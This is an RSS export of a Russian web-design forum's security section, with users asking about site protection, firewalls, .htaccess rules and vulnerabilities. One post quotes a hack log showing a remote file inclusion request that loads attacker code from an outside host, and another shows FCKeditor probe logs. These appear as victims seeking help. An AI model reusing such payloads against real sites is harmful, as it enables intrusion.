<?xml version="1.0" encoding="windows-1251"?>
<rss version="2.0" xmlns:ya="http://blogs.yandex.ru/" xmlns:wfw="http://wellformedweb.org/CommentAPI/">
<channel>
<title>Дизайнерский форум - Безопасность</title>
<link>https://web-silver.ru/forum</link>
<description>Дизайнерский форум</description>
<language>ru</language>
<managingEditor>admin@web-silver.ru</managingEditor>
<generator>Ya:Rss  revision 15.09.2008 (vb 3)</generator>

<item>
<title>Потерял я сон из-за парсера...</title>
<link>https://web-silver.ru/forum/showthread.php?t=16594</link>
<guid isPermaLink='true'>https://web-silver.ru/forum/showthread.php?t=16594#post138848</guid>
<description>Люди добрые, спать я не могу уже второй день. Столько сил и времени было вложено в &lt;a href=&quot;www.oae-auto.ru&quot;&gt;www.oae-auto.ru&lt;/a&gt;, а теперь появился мутный well-auto.ru, который парсит (пока не удачно, но это дело времени) каталог. Каталог между прочим ставится своим качеством и обилием фото (в отличие от конкурентов). &lt;br /&gt;
&lt;br /&gt;
По хорошему эти мудаки сайт переделывать не хотят, надо бороться по плохому. Помимо того, что мне жаль оригинальный контент, есть вариант, что это подставная компания, которая за нами будет прикрываться. &lt;br /&gt;
&lt;br /&gt;
Бывалые, дайте совет.</description>
<pubDate>Thu, 23 Jun 2011 09:35:02 +0400</pubDate>
<author>https://web-silver.ru/forum/member.php?u=18243</author>
</item>
<item>
<title>zashita</title>
<link>https://web-silver.ru/forum/showthread.php?t=16404</link>
<guid isPermaLink='true'>https://web-silver.ru/forum/showthread.php?t=16404#post137886</guid>
<description>kak ya mogi svayu sayt zashitit kakiye nibut tag est esli est napishite mne pojalusta</description>
<pubDate>Tue, 17 May 2011 10:27:59 +0400</pubDate>
<author>https://web-silver.ru/forum/member.php?u=19429</author>
</item>
<item>
<title>нужна программа</title>
<link>https://web-silver.ru/forum/showthread.php?t=15777</link>
<guid isPermaLink='true'>https://web-silver.ru/forum/showthread.php?t=15777#post134415</guid>
<description>Добрый все день. я незнаю есть лим такая программа которая будет показывать наличия ошибок на сайте, его уязвимости и все такое.  Хочу научиться устранять ошиби на собственных сайтах.  все названия программ (буду очень  признателен если будут ссылки на скачку) шлите мне на почту govebji@list.ru</description>
<pubDate>Sun, 06 Feb 2011 14:14:23 +0300</pubDate>
<author>https://web-silver.ru/forum/member.php?u=17144</author>
</item>
<item>
<title>FCKeditor -- зачем это делают?</title>
<link>https://web-silver.ru/forum/showthread.php?t=14874</link>
<guid isPermaLink='true'>https://web-silver.ru/forum/showthread.php?t=14874#post127911</guid>
<description>сегодня смотрела логи ошибок своего сайта. &lt;br /&gt;
[Tue Sep 21 22:40:37 2010] [error] [client 125.235.241.132] File does not exist:/public_html/test/FCKeditor/editor/filemanager/connectors/uploadtest.html&lt;br /&gt;
[Wed Sep 22 07:55:29 2010] [error] [client 202.108.5.35] File does not exist:/public_html/test/admin/FCKeditor/editor/filemanager/connectors/uploadtest.html&lt;br /&gt;
[Wed Sep 22 16:54:14 2010] [error] [client 222.89.92.106] File does not exist:/public_html/test/admin/fckeditor/editor/filemanager/connectors/uploadtest.html&lt;br /&gt;
&lt;br /&gt;
почитала об этом FCKeditor и поняла, что это что-то вроде взлома уязвимости. Только не поняла зачем это нужно? Из хулиганских побуждений или что-то залить на мой сайт? Удалась ли эта атака? И нужно ли от этого как-то защищаться?:notrust: и с каких щей ИП каждый раз разный?</description>
<pubDate>Wed, 22 Sep 2010 20:27:41 +0400</pubDate>
<author>https://web-silver.ru/forum/member.php?u=14519</author>
</item>
<item>
<title>Странный посетитель на сайте, что это может быть?</title>
<link>https://web-silver.ru/forum/showthread.php?t=14729</link>
<guid isPermaLink='true'>https://web-silver.ru/forum/showthread.php?t=14729#post126547</guid>
<description>Несколько дней на сайте возникает странная ситуация - 700-800 просмотров от одного посетителя, несколько часов  он на сайте.  Смотрю через яндекс - вебмастер. &lt;br /&gt;
&lt;br /&gt;
Сайтик маленький - всего около 50 html страничек. Обычно от 1 до 15 просмотров одного уникального посетителя. Территориально - какая-то Горловка на Украине. Знакомые сказали - сайт стал медленно открываться.&lt;br /&gt;
Что-то напрягают меня эти странности. &lt;br /&gt;
&lt;br /&gt;
Что он там может делать на сайте ?  Что это может быть?  Что надо проверить ???</description>
<pubDate>Fri, 03 Sep 2010 21:23:58 +0400</pubDate>
<author>https://web-silver.ru/forum/member.php?u=11616</author>
</item>
<item>
<title>Уникальная анонимная почтовая система</title>
<link>https://web-silver.ru/forum/showthread.php?t=14234</link>
<guid isPermaLink='true'>https://web-silver.ru/forum/showthread.php?t=14234#post122667</guid>
<description>Insorg-mail.info уникальная анонимная почтовая система.&lt;br /&gt;
&lt;br /&gt;
Каждый день любой активный пользователь Интернета сталкивается с необходимостью регистрации на различныx сайтах, форумах, сервисах и т.д.&lt;br /&gt;
&lt;br /&gt;
К сожалению часто мы сталкиваемся с тем, что тот или иной сервис,&lt;br /&gt;
сайт, форум использует нашу электронную почту для рассылок новостей, нежелательной электронной почты и т.п.&lt;br /&gt;
&lt;br /&gt;
Выход из проблем - Cервис Insorg-mail.info&lt;br /&gt;
&lt;br /&gt;
преимущества:&lt;br /&gt;
&lt;br /&gt;
Никакой регистрации&lt;br /&gt;
&lt;br /&gt;
Анонимность&lt;br /&gt;
&lt;br /&gt;
Легкость в использовании&lt;br /&gt;
&lt;br /&gt;
Письма стираются раз в сутки&lt;br /&gt;
&lt;br /&gt;
Получить почту готовую к работе за 1 секунду&lt;br /&gt;
&lt;br /&gt;
Убедитесь сами!</description>
<pubDate>Sat, 19 Jun 2010 00:35:57 +0400</pubDate>
<author>https://web-silver.ru/forum/member.php?u=15873</author>
</item>
<item>
<title>Защита серверов и сайтов от ddos-атак</title>
<link>https://web-silver.ru/forum/showthread.php?t=14193</link>
<guid isPermaLink='true'>https://web-silver.ru/forum/showthread.php?t=14193#post122332</guid>
<description>Конкуренты &quot;заказали&quot; ваш сайт? Или его атакуют хакеры? мы предлагаем вам квалифицированную помощь в защите от ддoс атак хакеров и от Exploit script&lt;br /&gt;
Наша работа это Защита от ddos-атаки без переноса сайта. Быстрая настройка, первые сутки - бесплатно. &lt;a href=&quot;http://protectlab.com&quot;&gt;http://protectlab.com&lt;/a&gt;. Мы защитим вашу информацию и предоставим защиту ресурсов.</description>
<pubDate>Sat, 12 Jun 2010 18:47:28 +0400</pubDate>
<author>https://web-silver.ru/forum/member.php?u=15809</author>
</item>
<item>
<title>Окно - как убрать?</title>
<link>https://web-silver.ru/forum/showthread.php?t=13961</link>
<guid isPermaLink='true'>https://web-silver.ru/forum/showthread.php?t=13961#post120389</guid>
<description>Здравствуйте! у меня вылезло окно со следующим содержанием:&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 [COLOR=&quot;Blue&quot;]Эта программа не может отобразить эту веб-страницу &lt;br /&gt;
   &lt;br /&gt;
   Возможные причины:&lt;br /&gt;
Нет подключения к Интернету. &lt;br /&gt;
На веб-узле возникли неполадки. &lt;br /&gt;
Возможно, сделана опечатка в адресе. &lt;br /&gt;
 &lt;br /&gt;
   Попробуйте сделать следующее: &lt;br /&gt;
     Проверьте подключение к Интернету. Попробуйте посетить другой веб-узел, чтобы убедиться в наличии подключения.  &lt;br /&gt;
 &lt;br /&gt;
     Заново введите адрес.  &lt;br /&gt;
 &lt;br /&gt;
     Перейдите на предыдущую страницу. &lt;br /&gt;
 &lt;br /&gt;
     Подробнее &lt;br /&gt;
&lt;br /&gt;
Эта проблема может быть вызвана различными причинами, например: &lt;br /&gt;
&lt;br /&gt;
Потеряно подключение к Интернету. &lt;br /&gt;
Этот веб-узел временно недоступен. &lt;br /&gt;
Нет доступа к DNS-серверу. &lt;br /&gt;
На DNS-сервере не найден адрес для домена этого веб-узла. &lt;br /&gt;
[/COLOR]&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
никак не могу закрыть. перезагрузка и очистка тем, что есть не помогает. подскажите как избавиться!!!! извините если не туда обратился.&lt;br /&gt;
&lt;br /&gt;
[B]Добавлено через 23 минуты[/B]&lt;br /&gt;
&lt;br /&gt;
или может отправите куда надо, где помогут справиться?</description>
<pubDate>Mon, 03 May 2010 12:11:31 +0400</pubDate>
<author>https://web-silver.ru/forum/member.php?u=14642</author>
</item>
<item>
<title>Чтобы сайт при старте открывался с https</title>
<link>https://web-silver.ru/forum/showthread.php?t=13458</link>
<guid isPermaLink='true'>https://web-silver.ru/forum/showthread.php?t=13458#post115564</guid>
<description>Недавно предо мной встала задача полностью перенести сайт в защищенный режим https, т.е. имеется сайт, обычные php файлы, как сделать так, чтобы сайт уже при старте открывался с https?&lt;br /&gt;
&lt;br /&gt;
HTTPS, наверно нужно в .htaccess редиректнуть?&lt;br /&gt;
&lt;br /&gt;
В общем, понятия не имею, как это сделать, но сделать нужно, может кто в более-менее свободной, понятной форме сможет объяснить, [B]что нужно делать[/B]?&lt;br /&gt;
&lt;br /&gt;
Хостер поддерживает доступ SSH/Shell, диспетчер SSL/TLS, ключи GnuPG сам может генерировать.   :eek:</description>
<pubDate>Wed, 24 Feb 2010 23:46:35 +0300</pubDate>
<author>https://web-silver.ru/forum/member.php?u=12049</author>
</item>
<item>
<title>Можно ли делать муниципальный сайт на бесплатной cms</title>
<link>https://web-silver.ru/forum/showthread.php?t=12390</link>
<guid isPermaLink='true'>https://web-silver.ru/forum/showthread.php?t=12390#post104492</guid>
<description>Правомерно ли будет делать сайт для администрации на Joomla, и если кто-нибудь делал - опишите проблемы.</description>
<pubDate>Tue, 29 Sep 2009 10:37:22 +0400</pubDate>
<author>https://web-silver.ru/forum/member.php?u=4066</author>
</item>
<item>
<title>GenP - Генератор паролей</title>
<link>https://web-silver.ru/forum/showthread.php?t=11973</link>
<guid isPermaLink='true'>https://web-silver.ru/forum/showthread.php?t=11973#post100184</guid>
<description>Генератор паролей. Поможет вам сгенировать надёжный пароль. В программе есть менеджер паролей. Работает без инсталляции.&lt;br /&gt;
&lt;a href=&quot;&quot;http&quot;&gt;Офф.Сайт&lt;/a&gt; :o&lt;br /&gt;
&lt;a href=&quot;&quot;http&quot;&gt;http://freeware.ru/&lt;/a&gt; :confused:</description>
<pubDate>Sat, 25 Jul 2009 16:42:10 +0400</pubDate>
<author>https://web-silver.ru/forum/member.php?u=10901</author>
</item>
<item>
<title>Защита директории с аватарами - .htaccess ?</title>
<link>https://web-silver.ru/forum/showthread.php?t=11900</link>
<guid isPermaLink='true'>https://web-silver.ru/forum/showthread.php?t=11900#post99591</guid>
<description>Доброе время суток все.&lt;br /&gt;
&lt;br /&gt;
Задача:&lt;br /&gt;
закрыть папку (chmod 777) в которую загружаются аватарки пользователей.&lt;br /&gt;
(также хочу данный .htaccess применить к папкам с шаблонами, фотками, аттачей и пр)&lt;br /&gt;
&lt;br /&gt;
Почти целую неделю лазил и выяснял какой необходим .htaccess.&lt;br /&gt;
К точному занаменателю не пришел.&lt;br /&gt;
Составил сборку директив в тестовом .htaccess&lt;br /&gt;
&lt;br /&gt;
Но есть подозрения что есть дубли.&lt;br /&gt;
Что-то может пойти не так и станет еще хуже (по безопасности)&lt;br /&gt;
&lt;br /&gt;
Привожу ниже код .htaccess с добавленными детективами.&lt;br /&gt;
Подскажите пожалуйста что в нем лишнее / что продублировано / что лучше улучшить?&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
# запрет листинга всех папок и под-папок&lt;br /&gt;
Options -Indexes&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
php_flag engine 0&lt;br /&gt;
AddType &quot;text/html&quot; .php .cgi .pl .fcgi .fpl .phtml .shtml .php2 .php3 .php4 .php5 .asp .jsp&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
# Отключаем PHP.&lt;br /&gt;
RemoveType php&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
&lt;IfModule mod_php4.c&gt;&lt;br /&gt;
  php_flag engine 0&lt;br /&gt;
&lt;/IfModule&gt;&lt;br /&gt;
 &lt;br /&gt;
&lt;IfModule mod_php5.c&gt;&lt;br /&gt;
  php_flag engine 0&lt;br /&gt;
&lt;/IfModule&gt;&lt;br /&gt;
 &lt;br /&gt;
 &lt;br /&gt;
# запрет на запуск файлов&lt;br /&gt;
RemoveHandler .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml&lt;br /&gt;
AddType application/x-httpd-php-source .phtml .php .php3 .php4 .php5 .php6 .phps .cgi .exe .pl .asp .aspx .shtml .shtm .fcgi .fpl .jsp .htm .html .wml &lt;br /&gt;
 &lt;br /&gt;
# запрет доступа к файлам&lt;br /&gt;
Order Deny, Allow&lt;br /&gt;
Deny from all&lt;br /&gt;
&lt;br /&gt;
Небольшие пояснения&lt;br /&gt;
&lt;br /&gt;
1. в папке с аватарками еще лежит пустой index.html&lt;br /&gt;
2. столько много &quot;методов защит&quot; - парайноя беспокоит :)&lt;br /&gt;
3. не оставил только Deny from all потому как слышал что&lt;br /&gt;
хакерский скрипт может из другой папки &quot;запустить&quot; зараженную аватарку&lt;br /&gt;
4. расширения указанные в качестве запрета могут быть изменены&lt;br /&gt;
(или немного не считаться)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Небольшие дополнения&lt;br /&gt;
&lt;br /&gt;
1. нашел вот еще такую &quot;заплатку&quot; - стоит ли ее добавить в .htaccess&lt;br /&gt;
&lt;FilesMatch &quot;.*&quot;&gt;&lt;br /&gt;
Order allow,deny&lt;br /&gt;
Deny from all&lt;br /&gt;
 &lt;br /&gt;
&lt;FilesMatch &quot;\.(список_легетимных_расширений через |)$|^$&quot;&gt;&lt;br /&gt;
Order deny,allow&lt;br /&gt;
Allow from all&lt;br /&gt;
&lt;br /&gt;
2. и еще одну - также не могу понять добовлять ее или нет :/&lt;br /&gt;
&lt;br /&gt;
Options None&lt;br /&gt;
Options +FollowSymLinks&lt;br /&gt;
&lt;br /&gt;
Всем откинувшимся заранее большое СПАСИБО!</description>
<pubDate>Sun, 12 Jul 2009 22:50:22 +0400</pubDate>
<author>https://web-silver.ru/forum/member.php?u=8427</author>
</item>
<item>
<title>Протестите на безопасность и наличие дыр</title>
<link>https://web-silver.ru/forum/showthread.php?t=11578</link>
<guid isPermaLink='true'>https://web-silver.ru/forum/showthread.php?t=11578#post96796</guid>
<description>Всем привет.&lt;br /&gt;
Я понимаю, что абсолютно безопасных и не взламываемых сайтов не бывает. наш люд все что угодно может сломать, но дело в том что хочу проверить свой сайт на предмет безопасности хотя бы в плане каких-то наиболее распостраненных дыр и уязвимостей.&lt;br /&gt;
Короче, кому не лень и есть желание протестите &lt;a href=&quot;http://www.htc-online.ru&quot;&gt;http://www.htc-online.ru&lt;/a&gt; на предмет безопасности. Конечно, большая просьба не убивать сайт (если это возможно), а указать на возможные дыры и недочеты. &lt;br /&gt;
 Еще раз повторюсь, не зверствуйте. Хоть бекап я и сделал, но не очень бы хотелось чтобы &quot;порвали&quot; мне магазин.</description>
<pubDate>Tue, 12 May 2009 14:58:03 +0400</pubDate>
<author>https://web-silver.ru/forum/member.php?u=5819</author>
</item>
<item>
<title>Сайт взломали, как устранить уязвимость</title>
<link>https://web-silver.ru/forum/showthread.php?t=10865</link>
<guid isPermaLink='true'>https://web-silver.ru/forum/showthread.php?t=10865#post91120</guid>
<description>Вопрос такой. У меня на хостинге peterhost.ru размещен свой сайт (портфолио). Недавно он перестал работать. Я обратился в службу техподдержки и мне сказали, что сайт был взломан, вся информация о взломе в файле hack.log (ниже приведу его листинг). Велели устранить уязвимость и дать знать им. Я, если честно, даже и не представляю где там может быть уязвимость.&lt;br /&gt;
&lt;br /&gt;
Текст файла:&lt;br /&gt;
&lt;br /&gt;
batmast   4889  0.0  0.5 800904 43752  ??  IV    2:32AM   0:00.23 httpd: batmast - &lt;a href=&quot;www.batmaster.ru&quot;&gt;www.batmaster.ru&lt;/a&gt; - GET /index.php?page=http://asaf.in/phpb.txt? HTTP/1.0 (&lt;br /&gt;
batmast  52916  0.0  0.0 777516  2012  ??  IV   Sun05PM   0:00.13 httpd: batmast - &lt;a href=&quot;www.batmaster.ru&quot;&gt;www.batmaster.ru&lt;/a&gt; - GET /index.php?page=http://asaf.in/phpb.txt? HTTP/1.0 (&lt;br /&gt;
batmast  64710  0.0  0.0     0     0  ??  Z    Sun06PM   0:00.08 &lt;defunct&gt;&lt;br /&gt;
batmast  64715  0.0  0.0 23732  1124  ??  I    Sun06PM   0:00.59 httpds (perl5.8.8)&lt;br /&gt;
&lt;br /&gt;
(batmast - это мой логин)&lt;br /&gt;
&lt;br /&gt;
Все адреса у меня имеют формат типа такого batmaster.ru/index.php?page=main (т.е. например страница main).&lt;br /&gt;
&lt;br /&gt;
Подскажите, что делать</description>
<pubDate>Tue, 17 Feb 2009 11:11:42 +0300</pubDate>
<author>https://web-silver.ru/forum/member.php?u=5819</author>
</item>
<item>
<title>POST библиотеки jquery</title>
<link>https://web-silver.ru/forum/showthread.php?t=10296</link>
<guid isPermaLink='true'>https://web-silver.ru/forum/showthread.php?t=10296#post85693</guid>
<description>[B]Добрый вечер.&lt;br /&gt;
Недавно при разработке приложения которое должно искать информацию на чужом сервере наткнулся на такую проблему.[/B]&lt;br /&gt;
&lt;br /&gt;
$.post('http://somesite.ru/second/search', { fromYear: &quot;1995&quot;, toYear: &quot;2008&quot;, mark: &quot;AUDI&quot;, model: &quot;A4&quot; }, function(data) {&lt;br /&gt;
alert(data);&lt;br /&gt;
} );&lt;br /&gt;
&lt;br /&gt;
[B]В итоге при вызове функции firebug выдает следующую ошибку [/B]&lt;br /&gt;
&lt;br /&gt;
uncaught exception: Access to restricted URI denied (NS_ERROR_DOM_BAD_URI)&lt;br /&gt;
[Break on this error] jQuery.readyList.push(function(){return ...[s.url]=modRes;if(!jsonp)success();}else&lt;br /&gt;
&lt;br /&gt;
я так понял что в данном случае действуют настройки безопасности, но в этом форуме я видел статью где говорится что определенно можно есть варианты.&lt;br /&gt;
Если учесть что сайт куда отсылается запрос партнерский и возможны изменения безопасности сервера для моего домена, можно ли таким образом обрабатывать запросы?&lt;br /&gt;
Или же использовать какие нибудь другие методы парсинга с сайта где используется метод POST и не видно строки запроса?</description>
<pubDate>Fri, 21 Nov 2008 00:03:29 +0300</pubDate>
<author>https://web-silver.ru/forum/member.php?u=10493</author>
</item>
<item>
<title>firewall буянит</title>
<link>https://web-silver.ru/forum/showthread.php?t=9331</link>
<guid isPermaLink='true'>https://web-silver.ru/forum/showthread.php?t=9331#post75889</guid>
<description>такая проблема, у меня outpost firewall 2007 не лицензия до вчерашнего дня обновлялся нормально а теперь конектица с сервером и вылетает. я думал у них сервер здох. но в графе новости появилась надпись что ваша версия устарела. и типа они прекратили делать обновления для 2007 версии?</description>
<pubDate>Tue, 03 Jun 2008 13:19:09 +0400</pubDate>
<author>https://web-silver.ru/forum/member.php?u=9470</author>
</item>
<item>
<title>как обойти анти спам бота</title>
<link>https://web-silver.ru/forum/showthread.php?t=9285</link>
<guid isPermaLink='true'>https://web-silver.ru/forum/showthread.php?t=9285#post75282</guid>
<description>В письме что я отправляю скриптом должен быть flash  как его вставить чтобы его не вырезал робот?</description>
<pubDate>Tue, 27 May 2008 13:22:16 +0400</pubDate>
<author>https://web-silver.ru/forum/member.php?u=9635</author>
</item>
<item>
<title>Генерация из динамического сайта статического</title>
<link>https://web-silver.ru/forum/showthread.php?t=9109</link>
<guid isPermaLink='true'>https://web-silver.ru/forum/showthread.php?t=9109#post73373</guid>
<description>Мне заказали сайт, сообщив сначала, что у фирмы есть свой сервер (где уже размещен их старый сайт). Предполагалось приобретение системы управления Amiro.&lt;br /&gt;
&lt;br /&gt;
    Затем, мне сообщают, что из соображений безопасности, на сервере возможно только создание статического сайта на html, невозможна установка никаких программ, систем, даже PHP, ввиду запрещенности любого открытого доступа к серверу.&lt;br /&gt;
&lt;br /&gt;
Далее меня просят разместить эту систему управления на другом компьютере, локально, чтобы сотрудники фирмы сами правили информацию на нем, потом этот сайт переводился как-то в статический сайт на html и копировался на этот сервер.&lt;br /&gt;
&lt;br /&gt;
Скажите, пожалуйста, целесообразно ли предлагаемое решение? И каким путем лучше решить эту проблему? &lt;br /&gt;
Еще я не очень представляю, как лучше сделать, чтоб система управления генерировала html файлы из php для копирования на сервер. Или нужно использовать программу, которая скачивает сайт в формате html?</description>
<pubDate>Mon, 28 Apr 2008 09:28:46 +0400</pubDate>
<author>https://web-silver.ru/forum/member.php?u=8833</author>
</item>
<item>
<title>Какой Firewall выбрать?</title>
<link>https://web-silver.ru/forum/showthread.php?t=8608</link>
<guid isPermaLink='true'>https://web-silver.ru/forum/showthread.php?t=8608#post70100</guid>
<description>Долго мучаюсь над этим вопросом, перепробывал уже много програмных продуктов, но так и не нашёл такой, который бы в полной мере смог оправдать все пои надежды. Но вопрос защиты персональных данных от злоумышленников даже в домашней сети с каждым днём становится всё острее! Что я уже попробывал:&lt;br /&gt;
&lt;br /&gt;
Outpost Security Suite Pro - самый адекватный продукт из всех, что я ипользовал. Гибкие настройки, очень удобный. Но он работает до поры до времени, иной раз даже сам замечал как его защита тупо ложится, однако интерфейс как ни в чём не было продолжает работать. Кстати при нём меня неоднократно ломали, хотя были кропотливо закрыты все уязвимые порты и проче.... Короче дырка, но чейчас он у меня установлен ибо лучше я не видел.&lt;br /&gt;
&lt;br /&gt;
KasperskyAnti-Hacker - гркзит систему по чём зря, после того как он мне написал &quot;Вы атакованы, адрис такой-то&quot; этот адрес омой же и есть, я его снёс. Короче лажовый продукт.&lt;br /&gt;
&lt;br /&gt;
Comodo Free Firewall - детская штука. Проработал у меня дня 2, потом упал после первого же обновления.&lt;br /&gt;
&lt;br /&gt;
ZoneAlarm - особой гибкости настроек нет, политика координально отличается от оутпоста, был мне рекомендован несколькими людьми, в том числе сис админами, но он меня совершенно не устроил, а вы чё скажете?&lt;br /&gt;
&lt;br /&gt;
Tiny_Firewall - это вообще давно и неправда, детсткая игрушка тоже, помнится....&lt;br /&gt;
&lt;br /&gt;
Так что же делать? что выбрать? как защитит свой домашний пк от злоумышленников и от самого себя же!&lt;br /&gt;
&lt;br /&gt;
Кто что порекомендует?</description>
<pubDate>Thu, 28 Feb 2008 11:09:04 +0300</pubDate>
<author>https://web-silver.ru/forum/member.php?u=2960</author>
</item>
<item>
<title>Безопасность при использовании Ajax от jquery</title>
<link>https://web-silver.ru/forum/showthread.php?t=8485</link>
<guid isPermaLink='true'>https://web-silver.ru/forum/showthread.php?t=8485#post68715</guid>
<description>Если например хакер видит у меня на страницах сайта в файле .js такое:&lt;br /&gt;
&lt;br /&gt;
$.ajax({&lt;br /&gt;
   type: &quot;POST&quot;,&lt;br /&gt;
   url: &quot;/core/ajax/load_friends_list.inc.php&quot;,&lt;br /&gt;
   data: &quot;name=John&amp;location=Boston&quot;,&lt;br /&gt;
   success: function(msg){&lt;br /&gt;
     alert( &quot;Data Saved: &quot; + msg );&lt;br /&gt;
   }&lt;br /&gt;
 });&lt;br /&gt;
&lt;br /&gt;
он может обратиться к этой странице (/core/ajax/load_friends_list.inc.php) напрямую с POST запросом и выполнить любую операцию, но с теми данными которые ему нужны...&lt;br /&gt;
Как от этого защититься?&lt;br /&gt;
&lt;br /&gt;
Использую модуль jquery...</description>
<pubDate>Thu, 24 Jan 2008 04:03:45 +0300</pubDate>
<author>https://web-silver.ru/forum/member.php?u=1392</author>
</item>
<item>
<title>Безопасность?</title>
<link>https://web-silver.ru/forum/showthread.php?t=8071</link>
<guid isPermaLink='true'>https://web-silver.ru/forum/showthread.php?t=8071#post65611</guid>
<description>Почитал форум... мне понравилось, но не нашел темы безопасность при создании сайтов. Т.е. как с безопасностью ваших сайтов, тех что вы делаете? Стало интересно и начал с этого прям здесь искать на этом сайтике. Есть результаты, но пока не буду их раскрывать по причине той же безопасности. Если интересна тема админу, пишите на мыло покажу, если пофигу этот сайт, то хоть создайте темку на форуме, а то вроде и построение сайтов но про безопасность забыто. Я понимаю что тут больше дизайн, но те команды что тут представлены, занимаются и программированием, а значит отвечают и за безопасность. Надеюсь быть услышаным....</description>
<pubDate>Thu, 13 Sep 2007 01:00:33 +0400</pubDate>
<author>https://web-silver.ru/forum/member.php?u=8043</author>
</item>
<item>
<title>&amp;quot;Нас сломали? Нас сломали!&amp;quot; или безопасность сайтов</title>
<link>https://web-silver.ru/forum/showthread.php?t=7429</link>
<guid isPermaLink='true'>https://web-silver.ru/forum/showthread.php?t=7429#post60722</guid>
<description>Следующий пост навел на размышления... &lt;br /&gt;
[QUOTE][B] ivan341: [/B]&lt;br /&gt;
 Nark, я уже нашел уязвимость в трех местах. Причем 2 в конференциях.&lt;br /&gt;
&lt;br /&gt;
Еще возможна в заказе. Но я не стал копать глубже.&lt;br /&gt;
Есть еще программка для скана сайта. Которая ищет предпологаймые или возможные уязвимости в ПхП скриптах.&lt;br /&gt;
&lt;br /&gt;
С помощью ее нашел 19 ошибок. И одна из них в проверки полей на символы &quot; / //\  ' и т.д.&lt;br /&gt;
...&lt;\blockquote&gt;&lt;br /&gt;
В следствии чего пришлось уйти в себя на два дня и разобраться в конце концов, как  обстоят дела на фронте безопасности скриптов...&lt;br /&gt;
&lt;br /&gt;
Из чего вынес: &lt;br /&gt;
Основные уязвимые места: &lt;br /&gt;
1. includы, evalы и тому подобные функции позволяющие интерпретировать не статические данные. (включая разновидности preg_replace  с разными модификаторами).&lt;br /&gt;
2. МySQL запросы. &lt;br /&gt;
3. Сторонний софт. &lt;br /&gt;
4. Не надежный провайдер.&lt;br /&gt;
5. Другие уязвимости.&lt;br /&gt;
&lt;br /&gt;
По первому пункту: &lt;br /&gt;
Чего делать не надо: инклюдить файлы передаваемые в качестве параметров; выполнять код передаваемый в качестве параметра.&lt;br /&gt;
Все это черевато полной потерей сайта или забросом левого скриптика, дающего полный контроль над сайтом злоумышленнику. &lt;br /&gt;
&lt;br /&gt;
По второму: &lt;br /&gt;
Экранировать. Экранировать. И еще раз экранировать. Все что поучаем или берем, все не статические элементы эранировать.&lt;br /&gt;
Чем черевато и как используется. Если есть возможность вклиниться в MySQL запрос можно: &lt;br /&gt;
1. Если можно переписать целиком запрос, то можно потерять все таблицы и потерять данные. Если установленны сторонние скрипты, свои админские формы и прочее можно лишиться сайта + см. п.1.&lt;br /&gt;
2. Если можно дописать (обычно в месте критериев отбора (WHERE)) запрос, и результат запроса выводится в каком-либо виде - возможность слить все данные. Если установленны сторонние скрипты/админские см п.1. (Делается это все через UNION. Изменение даных в этом случае не проходит.)&lt;br /&gt;
&lt;br /&gt;
По третьему:&lt;br /&gt;
Зачастую сторонние скрипты сложные, а иногда и вобще закрытые, что приводит к тому, что они вставляются как есть и тут все зависит от разработчика, потенциальной уязвимости и функциональной нагрузке скрипта. Одно можно сказать точно, что поставив такие скрпты нужно очень хорошо следить за обновлениями, патчами и заплатками :). Обычно в достаточно сложных скриптах раз в пол-года вылазят какие-нибудь критические баги.&lt;br /&gt;
&lt;br /&gt;
По четвертому:&lt;br /&gt;
Выберайте хороший хостинг. :).&lt;br /&gt;
&lt;br /&gt;
По пятому:&lt;br /&gt;
Сюда отнес кучу других уязвимостей, которые меня не особо касаются. Сакжу только, что многие из них появляются в местах где сторонний пользователь может постить информацию на ваш сайт. Защита сводится все к тому же: экранировать и еще раз экранировать.&lt;br /&gt;
&lt;br /&gt;
Отвечая на пост ivan341: &lt;br /&gt;
Спасибо за информацию. Посмотрел на уязвимости которые вы нашли. все они не критические и максимум, что возможно с ними было сделать - это получить информацию с базы данных (которую и так можно получить на сайте) и то это очень мало вероятно. А заказ он вобще практически ничего не делает. Максимум - вы бы заспамили бы мне ящик. &lt;br /&gt;
&lt;br /&gt;
Интерессно также какой программой вы пользовались при поиске уязвимостей. &lt;br /&gt;
ЗЫ (Небольшой камень в ваш огород) Я бы не стал использовать CMS у которых раз в два меяца выходят критические апдейты. И закрыл директорию /engine/ от листинга.</description>
<pubDate>Wed, 21 Feb 2007 11:30:39 +0300</pubDate>
<author>https://web-silver.ru/forum/member.php?u=5262</author>
</item>
<item>
<title>Безопасность от Teleport Pro?</title>
<link>https://web-silver.ru/forum/showthread.php?t=7379</link>
<guid isPermaLink='true'>https://web-silver.ru/forum/showthread.php?t=7379#post60258</guid>
<description>Господа программеры как защитить РНР скрипты от скачивания?&lt;br /&gt;
Может их как то надо расположить на сервере?</description>
<pubDate>Thu, 08 Feb 2007 13:36:20 +0300</pubDate>
<author>https://web-silver.ru/forum/member.php?u=2062</author>
</item><ya:more>https://web-silver.ru/forum/yarss.php?forum=31&amp;topic=7379</ya:more><wfw:commentRss>https://web-silver.ru/forum/yarss.php?forum=31&amp;mode=comments</wfw:commentRss></channel></rss>